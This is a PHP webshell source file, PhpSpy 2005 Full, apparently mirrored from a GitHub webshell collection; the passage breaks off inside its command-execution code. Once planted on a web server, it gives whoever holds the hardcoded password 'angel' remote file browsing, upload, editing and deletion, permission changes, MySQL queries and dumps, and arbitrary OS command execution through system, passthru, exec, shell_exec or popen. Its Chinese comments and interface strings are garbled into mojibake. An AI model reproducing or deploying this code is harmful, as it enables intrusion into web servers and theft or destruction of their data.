Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-11-22 19:23:05 +00:00
Code Issues Projects Releases Packages Wiki Activity
webshell/php/phpspy/phpspy_2005_full.php

1211 lines
38 KiB
PHP
Raw Normal View History

update phpspy
2013-05-23 10:16:33 +00:00
<?php
/*
+--------------------------------------------------------------------------+
| str_replace("-", "", "P-h-p-S-p-y") Version:2005 Full |
| Codz by Angel |
| (c) 2004 Security Angel Team |
| http://www.4ngel.net |
| ======================================================================== |
| Team: http://www.4ngel.net |
| http://www.bugkidz.org |
| Email: 4ngel@21cn.com |
| Date: Dec 28st(My girl friend's birthday), 2004 |
+--------------------------------------------------------------------------+
*/
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> =====================*/
// <20>Ƿ<EFBFBD><C7B7><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤,1Ϊ<31><CEAA>Ҫ<EFBFBD><D2AA>֤,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊֱ<CEAA>ӽ<EFBFBD><D3BD><EFBFBD>.<2E><><EFBFBD><EFBFBD>ѡ<EFBFBD><D1A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ч
$admin['check']="1";
// <20><>֤<EFBFBD><D6A4>ʽ,1Ϊ<31><CEAA><EFBFBD><EFBFBD> Session <20><>֤,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> Cookie<69><65>֤
// Ĭ<>ϲ<EFBFBD><CFB2><EFBFBD> Session <20><>֤,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>½,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ Cookie<69><65>֤
$admin['checkmode']="1";
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤,<2C><><EFBFBD>޸ĵ<DEB8>½<EFBFBD><C2BD><EFBFBD><EFBFBD>
$admin['pass']="angel";
/*===================== <20><><EFBFBD>ý<EFBFBD><C3BD><EFBFBD> =====================*/
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> register_globals = off <20>Ļ<EFBFBD><C4BB><EFBFBD><EFBFBD>¹<EFBFBD><C2B9><EFBFBD>
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
$self = $_SERVER['PHP_SELF'];
/*===================== <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤ =====================*/
if($admin['check']=="1") {
if($admin['checkmode']=="1") {
/*------- session <20><>֤ -------*/
session_start();
if ($_GET['action'] == "logout") {
session_destroy();
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\"<><D7A2><EFBFBD>ɹ<EFBFBD>......<p><a href=\"".$self."\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6>˳<EFBFBD><CBB3>򵥻<EFBFBD><F2B5A5BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&gt;&gt;&gt;</a></span>";
exit;
}
if ($login) {
$adminpass=trim($_POST['adminpass']);
if ($adminpass==$admin['pass']) {
$_SESSION['adminpass'] = $admin['pass'];
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\"><3E><>½<EFBFBD>ɹ<EFBFBD>......<p><a href=\"".$self."\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6><EFBFBD>ת<EFBFBD>򵥻<EFBFBD><F2B5A5BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&gt;&gt;&gt;</a></span>";
exit;
}
}
if (session_is_registered('adminpass')) {
if ($_SESSION['adminpass']!=$admin['pass']) {
loginpage();
}
} else {
loginpage();
}
} else {
/*------- cookie <20><>֤ -------*/
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\"<><D7A2><EFBFBD>ɹ<EFBFBD>......<p><a href=\"".$self."\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6>˳<EFBFBD><CBB3>򵥻<EFBFBD><F2B5A5BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&gt;&gt;&gt;</a></span>";
exit;
}
if ($login) {
$adminpass=trim($_POST['adminpass']);
if ($adminpass==$admin['pass']) {
setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\"><3E><>½<EFBFBD>ɹ<EFBFBD>......<p><a href=\"".$self."\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6><EFBFBD>ת<EFBFBD>򵥻<EFBFBD><F2B5A5BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&gt;&gt;&gt;</a></span>";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass']!=$admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
}//end check
/*===================== <20><>֤<EFBFBD><D6A4><EFBFBD><EFBFBD> =====================*/
// <20>ж<EFBFBD> magic_quotes_gpc ״̬
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
if ($_GET['action'] == "phpinfo") {
$dis_func = get_cfg_var("disable_functions");
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() <20><><EFBFBD><EFBFBD><EFBFBD>ѱ<EFBFBD><D1B1><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD>鿴&lt;PHP<48><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&gt;";
exit;
}
// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
if (!empty($downfile)) {
if (!@file_exists($downfile)) {
echo "<script>alert('<27><>Ҫ<EFBFBD>µ<EFBFBD><C2B5>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!')</script>";
} else {
$filename = basename($downfile);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP Generated Data');
header('Content-Length: '.filesize($downfile));
@readfile($downfile);
exit;
}
}
// <20><><EFBFBD><EFBFBD>Ŀ¼
$pathname=str_replace('\\','/',dirname(__FILE__));
// <20><>ȡ<EFBFBD><C8A1>ǰ·<C7B0><C2B7>
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// <20>ж϶<D0B6>д<EFBFBD><D0B4><EFBFBD><EFBFBD>
if (dir_writeable($nowpath)) {
$dir_writeable = "<EFBFBD><EFBFBD>д";
} else {
$dir_writeable = "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>д";
}
$dis_func = get_cfg_var("disable_functions");
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell</a>" : "";
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PhpSpy Ver 2005</title>
<style type="text/css">
body,td {
font-family: "sans-serif";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "sans-serif";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
.redfont {
COLOR: "#A60000";
}
a:link,
a:visited,
a:active{
color: "#000000";
text-decoration: underline;
}
a:hover{
color: "#465584";
text-decoration: none;
}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form)
{
for (var i=0;i<form.elements.length;i++)
{
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
</SCRIPT>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<table width="760" border="0" cellpadding="3" cellspacing="0" bgcolor="#ffffff">
<tr bgcolor="#cccccc">
<td width="375" align="right" nowrap><b><?=$_SERVER['HTTP_HOST']?></b></td>
<td width="10" align="center" nowrap><b>:</b></td>
<td width="375" nowrap><b><?=$_SERVER['REMOTE_ADDR']?></b></td>
</tr>
<tr>
<td colspan="3" align="center" nowrap><a href="?action=logout">ע<EFBFBD><EFBFBD><EFBFBD></a> | <a href="?action=dir"><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PhpSpy Ŀ¼</a> | <a href="?action=phpenv">PHP<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL Query</a> | <a href="?action=sqlbak">MySQL Backup</a> | <a href="http://www.4ngel.net" target="_blank" title="<22><><EFBFBD>ش˳<D8B4><CBB3><EFBFBD>">Version 2005</a></td>
</tr>
</table>
<hr width="760" noshade>
<table width="760" border="0" cellpadding="0">
<form action="" method="GET">
<tr>
<td><p><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD>:<?=$pathname?><br><3E><>ǰĿ¼(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>
<br><EFBFBD><EFBFBD>תĿ¼:
<input name="dir" type="text" class="INPUT">
<input type="submit" class="INPUT" value="ȷ<EFBFBD><EFBFBD>"> <EFBFBD><EFBFBD>֧<EFBFBD>־<EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
</p></td>
</tr>
</form>
<form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">
<tr>
<td colspan="2"><EFBFBD>ϴ<EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǰĿ¼:
<input name="uploadmyfile" type="file" class="INPUT"> <input type="submit" name="uploadfile" class="INPUT" value="ȷ<EFBFBD><EFBFBD>">
<input type="hidden" name="uploaddir" value="<?=$dir?>"></td>
</tr>
</form>
<form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">
<tr>
<td colspan="2"><EFBFBD>½<EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>ڵ<EFBFBD>ǰĿ¼:
<input name="newfile" type="text" class="INPUT" value="">
<input type="submit" class="INPUT" name="createfile" value="ȷ<EFBFBD><EFBFBD>"></td>
</tr>
</form>
<form action="" method="POST">
<tr>
<td colspan="2"><EFBFBD>½<EFBFBD>Ŀ¼<EFBFBD>ڵ<EFBFBD>ǰĿ¼:
<input name="newdirectory" type="text" class="INPUT" value="">
<input type="submit" class="INPUT" name="createdirectory" value="ȷ<EFBFBD><EFBFBD>"></td>
</tr>
</form>
</table>
<hr width="760" noshade>
<?php
/*===================== ִ<>в<EFBFBD><D0B2><EFBFBD> <20><>ʼ =====================*/
echo "<p><b>\n";
// ɾ<><C9BE><EFBFBD>ļ<EFBFBD>
if(@$delfile!="") {
if(file_exists($delfile)) {
if (@unlink($delfile)) {
echo "".$delfile." ɾ<><C9BE><EFBFBD>ɹ<EFBFBD>!";
} else {
echo "<EFBFBD>ļ<EFBFBD>ɾ<EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>!";
}
} else {
echo "<EFBFBD>ļ<EFBFBD><EFBFBD>Ѳ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><><C9BE>ʧ<EFBFBD><CAA7>!";
}
}
// ɾ<><C9BE>Ŀ¼
elseif($rmdir) {
if($deldir!="") {
$deldirs="$dir/$deldir";
if(!file_exists("$deldirs")) {
echo "Ŀ¼<EFBFBD>Ѳ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!";
} else {
deltree($deldirs);
}
} else {
echo "ɾ<EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>!";
}
}
// <20><><EFBFBD><EFBFBD>Ŀ¼
elseif($createdirectory) {
if(!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if(file_exists("$mkdirs")) {
echo "<EFBFBD><EFBFBD>Ŀ¼<EFBFBD>Ѵ<EFBFBD><EFBFBD><EFBFBD>!";
} else {
echo $msg=@mkdir("$mkdirs",0777) ? "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<EFBFBD>ɹ<EFBFBD>!" : "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>!";
@chmod("$mkdirs",0777);
}
}
}
// <20>ϴ<EFBFBD><CFB4>ļ<EFBFBD>
elseif($uploadfile) {
echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "<EFBFBD>ϴ<EFBFBD><EFBFBD>ɹ<EFBFBD>!" : "<EFBFBD>ϴ<EFBFBD>ʧ<EFBFBD><EFBFBD>!";
}
// <20><EFBFBD>ļ<EFBFBD>
elseif($doeditfile) {
$filename="$editfilename";
@$fp=fopen("$filename","w");
echo $msg=@fwrite($fp,$_POST['filecontent']) ? "д<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>ɹ<EFBFBD>!" : "д<EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>!";
@fclose($fp);
}
// <20><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
elseif($editfileperm) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo $msg=@chmod($dir."/".$file,$fileperm) ? "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>޸ijɹ<EFBFBD>!" : "<EFBFBD>޸<EFBFBD>ʧ<EFBFBD><EFBFBD>!";
echo " [".$file."] <20>޸ĺ<DEB8><C4BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4)."";
}
// <20><><EFBFBD><EFBFBD>MYSQL
elseif($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ӳɹ<EFBFBD>!";
mysql_close();
} else {
echo mysql_error();
}
}
// ִ<><D6B4>SQL<51><4C><EFBFBD><EFBFBD>
elseif($doquery) {
@mysql_connect($servername,$dbusername,$dbpassword) or die("<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>");
@mysql_select_db($dbname) or die("ѡ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>ʧ<EFBFBD><EFBFBD>");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>ִ<EFBFBD><EFBFBD>" : "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>: ".mysql_error();
mysql_close();
}
// <20><><EFBFBD>ݲ<EFBFBD><DDB2><EFBFBD>
elseif ($dobackup) {
if (empty($_POST[table])) {
echo "<EFBFBD><EFBFBD>ѡ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݵ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݱ<EFBFBD>";
} else {
@mysql_connect($servername,$dbusername,$dbpassword) or die("<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>");
@mysql_select_db($dbname) or die("ѡ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>ʧ<EFBFBD><EFBFBD>");
$table = array_flip($_POST[table]);
$filehandle = @fopen($path,"w");
if ($filehandle) {
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>: ".mysql_error();
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0], $filehandle);
fwrite($filehandle,"\n\n\n");
}
}
fclose($filehandle);
echo "<EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><EFBFBD>ѳɹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݵ<EFBFBD> <a href=\"".$path."\" target=\"_blank\">".$path."</a>";
mysql_close();
} else {
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>,<2C><>ȷ<EFBFBD><C8B7>Ŀ<EFBFBD><C4BF><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD>п<EFBFBD>дȨ<D0B4><C8A8>.";
}
}
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PS:<3A>ļ<EFBFBD>̫<EFBFBD><CCAB><EFBFBD><EFBFBD><EFBFBD>ܷdz<DCB7><C7B3><EFBFBD>
// Thx : С<><D0A1>
elseif($downrar) {
if ($dl != "") {
$dfiles="";
foreach ($dl AS $filepath=>$value) {
$dfiles.=$filepath.",";
}
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
$dl=explode(",",$dfiles);
$zip=new PHPZip($dl);
$code=$zip->out;
$filename=$_POST['rarfile'];
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$filename);
echo $code;
exit;
} else {
echo "<EFBFBD><EFBFBD>ѡ<EFBFBD><EFBFBD>Ҫ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ص<EFBFBD><EFBFBD>ļ<EFBFBD>.";
}
}
// <20>鿴PHP<48><50><EFBFBD>ò<EFBFBD><C3B2><EFBFBD>״<EFBFBD><D7B4>
elseif($viewphpvar) {
echo "<EFBFBD><EFBFBD><EFBFBD>ò<EFBFBD><EFBFBD><EFBFBD> ".$_POST['phpvarname']." <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: ".getphpcfg($_POST['phpvarname'])."";
}
else {
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <a href=\"http://www.4ngel.net\" target=\"_blank\">Security Angel</a> С<><D0A1> angel [<a href=\"http://www.bugkidz.org\" target=\"_blank\">BST</a>] <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD> <a href=\"http://www.4ngel.net\" target=\"_blank\">www.4ngel.net</a> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>°汾.";
}
echo "</b></p>\n";
/*===================== ִ<>в<EFBFBD><D0B2><EFBFBD> <20><><EFBFBD><EFBFBD> =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr bgcolor="#cccccc">
<td align="center" nowrap width="30%"><b><EFBFBD>ļ<EFBFBD></b></td>
<td align="center" nowrap width="17%"><b><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></b></td>
<td align="center" nowrap width="17%"><b><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>޸<EFBFBD></b></td>
<td align="center" nowrap width="12%"><b><EFBFBD><EFBFBD>С</b></td>
<td align="center" nowrap width="7%"><b><EFBFBD><EFBFBD><EFBFBD><EFBFBD></b></td>
<td align="center" nowrap width="17%"><b><EFBFBD><EFBFBD><EFBFBD><EFBFBD></b></td>
</tr>
<?php
// Ŀ¼<C4BF>б<EFBFBD>
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="1"){
if($file!=".." && $file!=".") {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">&lt;dir&gt;</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\"<><C9BE></a></td>\n";
echo "</tr>\n";
$dir_i++;
} else {
if($file=="..") {
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><3E><><EFBFBD><EFBFBD><EFBFBD>ϼ<EFBFBD>Ŀ¼</a></td>\n";
echo "</tr>\n";
}
}
}
}//while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
<td colspan="6" height="5"></td>
</tr>
<FORM action="" method="POST">
<?
// <20>ļ<EFBFBD><C4BC>б<EFBFBD>
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="0"){
$size=@filesize($filepath);
$size=$size/1024 ;
$size= @number_format($size, 3);
if (@filectime($filepath) == @filemtime($filepath)) {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
} else {
$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
}
@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\"><INPUT type=checkbox value=1 name=dl[$filepath]><a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"right\" nowrap valign=\"top\" class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($filepath)."\"><3E><><EFBFBD><EFBFBD></a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\"><3E>༭</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($filepath)."\"<><C9BE></a></td>\n";
echo "</tr>\n";
$file_i++;
}
}
@closedir($dirs);
?>
<tr class="<?=getrowbg()?>">
<td nowrap colspan="6"><table width="100%" border="0" cellpadding="2" cellspacing="0" align="center">
<tr>
<td><INPUT onclick="CheckAll(this.form)" type="checkbox" value="on" name="chkall"> <input name="rarfile" type="text" class="INPUT" value="<?=$_SERVER['HTTP_HOST']?>_Files.rar"> <input type="submit" name="downrar" value="ѡ<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" class="INPUT"></td>
<td align="right"><?=$dir_i?> <20><>Ŀ¼ / <?=$file_i?> <20><><EFBFBD>ļ<EFBFBD></td>
</tr>
</table></td>
</tr>
</FORM>
</table>
<?php
}// end dir
elseif ($_GET['action'] == "editfile") {
if($newfile=="") {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center"><EFBFBD>½<EFBFBD>/<EFBFBD><EFBFBD>ļ<EFBFBD> [<a href="?dir=<?=urlencode($dir)?>"><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a>]</td>
</tr>
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center"><EFBFBD><EFBFBD>ǰ<EFBFBD>ļ<EFBFBD>:<input class="input" type="text" name="editfilename" size="30"
value="<?=$filename?>"> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD></td>
</tr>
<tr class="firstalt">
<td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>
</tr>
<tr class="secondalt">
<td align="center"><input type="submit" name="doeditfile" value="ȷ<EFBFBD><EFBFBD>д<EFBFBD><EFBFBD>" class="input">
<input type="reset" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD>" class="input"></td>
</tr>
</form>
</table>
<?php
}//end editfile
elseif ($_GET['action'] == "shell") {
if (!get_cfg_var("safe_mode")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">WebShell Mode</td>
</tr>
<form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center"><EFBFBD><EFBFBD>ʾ:<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȫ,<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>.<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Եõ<EFBFBD>ȫ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.</td>
</tr>
<tr class="firstalt">
<td align="center">
ѡ<EFBFBD><EFBFBD>ִ<EFBFBD>к<EFBFBD><EFBFBD><EFBFBD>:
<select name="execfunc" class="input">
<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
</select><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
<input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">
<input type="submit" value="execute" class="input"></td>
</tr>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
if (!empty($_POST['command'])) {
if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
